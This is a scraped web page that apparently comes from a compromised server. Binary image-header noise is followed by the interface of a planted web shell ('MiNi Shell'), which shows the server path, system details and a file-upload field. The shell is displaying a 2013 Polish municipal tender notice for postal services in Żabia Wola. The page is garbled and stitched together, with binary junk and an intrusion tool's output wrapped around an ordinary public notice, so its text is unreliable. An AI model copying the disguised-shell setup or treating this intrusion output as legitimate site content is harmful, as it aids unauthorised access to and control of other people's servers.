JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131211/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131211/512238-N-2013.html

<p class="kh_header"><b>Żabia Wola: Świadczenie usług pocztowych w obrocie krajowym i zagranicznym 
na rzecz Gminy Żabia Wola w zakresie przyjmowania, przemieszczania 
i doręczania przesyłek oraz zwrotu przesyłek niedoręczonych w roku 2014</b><br>
<b>Numer ogłoszenia: 512238 - 2013; data zamieszczenia: 11.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żabia Wola , ul. Główna 3, 96-321 Żabia Wola, woj. mazowieckie, tel. 046 8578182, 8578224, faks 046 8578181.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabiawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym 
na rzecz Gminy Żabia Wola w zakresie przyjmowania, przemieszczania 
i doręczania przesyłek oraz zwrotu przesyłek niedoręczonych w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym 
i zagranicznym dla niżej wymienionego punktu kancelaryjnego Zamawiającego:
Gmina Żabia Wola,  ul. Główna 3, 96-321 Żabia Wola
2.W zakres przedmiotu zamówienia wchodzą:
usługi pocztowe w obrocie krajowym i zagranicznym dla przesyłek listowych o wadze do 2000 g w zakresie ich przyjmowania, przemieszczania i doręczania,
doręczania zwrotów przesyłek listowych nie doręczonych, po wyczerpaniu wszystkich możliwości ich doręczenia lub wydania odbiorcy,
usługi pocztowe dotyczące paczek pocztowych.
3.Przedmiot zamówienia winien być realizowany na zasadach określonych w powszechnie obowiązujących przepisach prawa, w szczególności w ustawie z dnia 23 listopada 
2012 r. Prawo pocztowe (Dz.U.2012.poz. 1529 ).
4.Z wybranym wykonawcą zostanie zawarta umowa obejmująca świadczenie usług pocztowych.
5.Wartość należności za świadczenie usług pocztowych obliczana będzie 
w okresach miesięcznych, jako iloczyn ceny jednostkowej zaoferowanej w ofercie przetargowej za dany rodzaj przesyłki oraz rzeczywistej ilości przesyłek danego rodzaju.
6.Zamawiający wymaga aby Wykonawca co miesiąc wystawiał fakturę na Gminę 
Żabia Wola, ul Główna 3, 96-321 Żabia Wola, NIP: 838-14-26-472.
7.W zakres przedmiotu umowy wchodzą wyszczególnianie rodzajów przesyłek, paczek, zwrotów przesyłek nie doręczonych oraz ich szacunkowe ilości w okresie realizacji umowy, przewidywane przez zamawiającego, które zostały zawarte w załączniku nr 5 
do niniejszej SIWZ. Wskazane w tym załączniku szacunkowe ilości zostały podane 
dla potrzeb skalkulowania cen ofert dla Wykonawców, na podstawie wykonania usług 
z lat ubiegłych. Nie mogą one skutkować jakimkolwiek roszczeniem Wykonawcy. 
8.Użyte w SIWZ określenia związane z opisem przedmiotu zamówienia oznaczają:
a)Przesyłka rejestrowana - przesyłka przyjęta za pokwitowaniem przyjęcia i doręczana za pokwitowaniem odbioru.
b)Przesyłka nierejestrowana - przesyłka przyjęta bez pokwitowania przyjęcia 
i doręczana bez pokwitowania odbioru;
c)Przesyłka priorytetowa - przesyłka listowa rejestrowana lub nie rejestrowana mająca pierwszeństwo w procesie doręczania przed pozostałymi przesyłkami. 
d)Przesyłka ekonomiczna- przesyłka listowa rejestrowana lub nierejestrowana 
nie będąca przesyłką priorytetową;
e)Przesyłka polecona - przesyłka listowna rejestrowana, przemieszczana i doręczana 
w sposób zabezpieczający ją przed utratą , ubytkiem zawartości lub uszkodzeniem;
f)Zwrotne potwierdzenie odbioru - zwrócone nadawcy potwierdzone odbioru zawierające datę i podpis odbiorcy, stanowiące potwierdzenie otrzymania przesyłki. 
g)W zakresie przesyłek przez gabaryt A rozumie się przesyłki, których minimalne wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm, a maksymalnie wymiary przesyłki to przesyłki wysłane w kopertach nie większy niż format C4. 
Przez gabaryt B - przesyłki wysłane w kopertach o formacie B4 i większych, 
jednak maksymalnie suma długości, szerokości i wysokości wynosi 900 mm, 
przy czym największy z tych wymiarów nie może przekraczać 600 mm. 
h)W zakresie paczek pocztowych przez gabaryt A rozumie się: paczki o wymiarach minimum strony adresowej nie mniejszej niż 90x140mm, a maksimum: 
długość 600mm, szerokość 500 oraz wysokość 300mm. Przez Gabaryt B paczki 
o wymiarach: minimum - jeśli choć jeden z wymiarów  przekracza długość 600mm, szerokość 500mm, a wysokość 300mm maksimum - kiedy suma długości 
i największego obwodu mierzonego w innym kierunku niż długość wynosi 3000mm, przy czym największy wymiar nie może przekroczyć 1500mm
Ustalenia organizacyjne związane z wykonaniem zamówienia:
1)Zamawiający wymaga, aby usługa dostarczania przesyłek, paczek, świadczona była 
dla każdego wskazanego przez Zamawiającego adresu w Polsce lub na obszarze Europy.
2)Znaczek opłaty pocztowej może zostać zastąpiony pieczęcią wykonaną wg wzoru dostarczonego przez Wykonawcę lub innym uzgodnionym oznaczeniem.
3)Rozliczenia za wykonane usługi pocztowe następować będą w okresach miesięcznych 
w formie opłaty z dołuw terminie 14 dni od daty dostarczenia prawidłowo wystawionej faktury. Należność zostanie obliczona jako iloczyn ceny jednostkowej zaoferowanej przez Wykonawcę w niniejszym postępowaniu za dany rodzaj przesyłki oraz faktycznej ilości przesyłek danego rodzaju. 
4)W przypadku wysyłki przez Zamawiającego korespondencji nieokreślonej w załączniku nr 5 do niniejszej umowy (formularz asortymentowo- cenowy), rozliczenie nastąpi zgodnie z obowiązującymi cennikami Wykonawcy.
5)Nadanie przesyłek następować będzie w dniu otrzymania ich przez Wykonawcę.
6)Przyjmowanie przesyłek listownych odbywać się będzie raz dziennie w wyznaczonym przez Wykonawcę punkcie odbioru  od upoważnionego pracownika Zamawiającego 
w godzinach 15:00- 17:00.
7)Zamawiający, każdorazowo przygotuje wykaz przesyłek listowych i paczek przeznaczonych do nadania. Wykaz zawierać będzie : dane adresata, wagę, informację 
o rodzaju przesyłki.
8)Wykonawca będzie bezpłatnie dostarczał do Zamawiającego wykaz przesyłek niedostarczonych (wykaz zwrotów). Wykonawca określi dodatkowo powód niepodjęcia przez adresata przesyłki.
9)Wykonawca dostarczy bezpłatnie Zamawiającemu druki zwrotnego potwierdzenia odbioru przesyłek.
10)W przypadku uszkodzenia przesyłki Wykonawca ma obowiązek ją zabezpieczyć 
oraz nanieść stosowną adnotację wraz z informacją o osobie dokonującej zabezpieczania.
11)Punkt, z którego paczki oraz przesyłki będą dostarczane przez Zamawiającego 
do Wykonawcy nie powinien znajdować się w odległości większej niż 5 km od siedziby Zamawiającego.
12)Jeśli warunek, o którym mowa w punkcie 11 jest niemożliwy do spełnienia, Wykonawca ma obowiązek zapewnić odbiór przesyłek przeznaczonych do natychmiastowej wysyłki bezpośrednio z siedziby Zamawiającego po uprzednim zgłoszeniu telefonicznym, 
tego samego dnia do godziny 13:00.
13)Przesyłki, o których mowa w punkcie 12, Zamawiający ma obowiązek zgłosić Wykonawcy do godziny 12:00. 
Wymagania stawiane Wykonawcy:
1)Wykonawca jest odpowiedzialny za całokształt, w tym za przebieg oraz terminową realizację przedmiotu umowy do czasu wygaśnięcia zobowiązań Wykonawcy wobec Zamawiającego.
2)Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
3)Wymagana jest należyta staranność przy realizacji zobowiązań umowy, rozumiana 
jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia.
4)Ustalenia i decyzje dotyczące wykonywania umowy uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
5)Wykonawca wskaże telefony kontaktowe i numery faksów oraz dokona innych ustaleń niezbędnych do sprawnego  i terminowego wykonania zamówienia.
Możliwość zatrudniania podwykonawców:
1)Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania 
części lub całości zamówienia podwykonawcom. W takim przypadku Wykonawca zobowiązany jest do wskazania w swojej ofercie części zamówienia (zakresu), 
których wykonanie zamierza powierzyć podwykonawcom.
2)Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za wszelkie czynności, których wykonanie powierzył Podwykonawcom. Wykonawca odpowiada 
za działania i zaniechania Podwykonawców jak za własne.
3)Wykonawca ponosi wyłączną odpowiedzialność za dokonywanie w terenie wszelkich rozliczeń finansowych z Podwykonawcami..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje zamówienia  uzupełniające zgodnie z art.67 ust 1 pkt.6</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby wykonawca był wpisany do rejestru operatorów pocztowych zgodnie z art. 6 ust. 1 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz.U.2012.1529 ). 
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez Wykonawcę 
do oferty oświadczeń i dokumentów, z treści których wynikać powinny informacje potwierdzające spełnianie warunku, na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania 
z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż w okresie ostatnich 3 lat przed wszczęciem postępowania, 
a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonanie co najmniej  1 usługę polegającą na świadczeniu 
usług pocztowych w obrocie krajowym przez okres co najmniej 12 miesięcy, o wartości nie mniejszej niż 50.000,00zł brutto wraz z podaniem jej wartości, przedmiotu, 
dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, 
oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez Wykonawcę 
do oferty oświadczeń i dokumentów, z treści których wynikać powinny informacje potwierdzające spełnianie warunku, na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania 
z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku Wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo w oryginale lub notarialnie poświadczonej kopii,do reprezentowania ich w prowadzonym postępowaniu o udzielenie zamówienia albo do reprezentowania w prowadzonym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo osoby/osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, 
o ile wynikają z przepisów prawa lub innych dokumentów
1 Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, należy przedstawić dokumenty dotyczące w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa rozdziale IX SIWZ ust 5 pkt c - składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę, potwierdzające odpowiednio, że posiada uprawnienia do wykonywania działalności związanej z przedmiotem zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia niniejszej umowy, jak i również wszelkie zawiadomienia, zapytania lub informacje odnoszące się lub wynikające z wykonania przedmiotu umowy wymagają formy pisemnej, pod rygorem nieważności . 2. Zamawiający zastrzega sobie prawo do zmian treści zawartej umowy w przypadku , gdy konieczność ich wprowadzenia wyniknie z okoliczność, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany mogą dotyczyć okoliczności wynikających z przyczyn technicznych, gospodarczych, finansowych, organizacyjnych. 3. Niezależnie od okoliczności wymienionych w pkt 2 Zamawiający ma prawo dokonać zmiany umowy dotyczących w szczególności: a. zmiany osób odpowiedzialnych za realizację przedmiotu umowy oraz pracowników Wykonawcy realizujących postanowienia umowy. b. Zmiany siedziby jednej ze stron umowy, c. Zmian regulacji prawnych obowiązujących w dniu podpisania umowy, a mających wpływ na wykonanie niniejszej umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabiawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żabia Wola ul. Głowna 3. 96-321 Żabia Wola..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2013 godzina 10:00, miejsce: Urząd Gminy Żabia Wola ul. Głowna 3. 96-321 Żabia Wola w pokoju nr 5 (sekretariat),..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com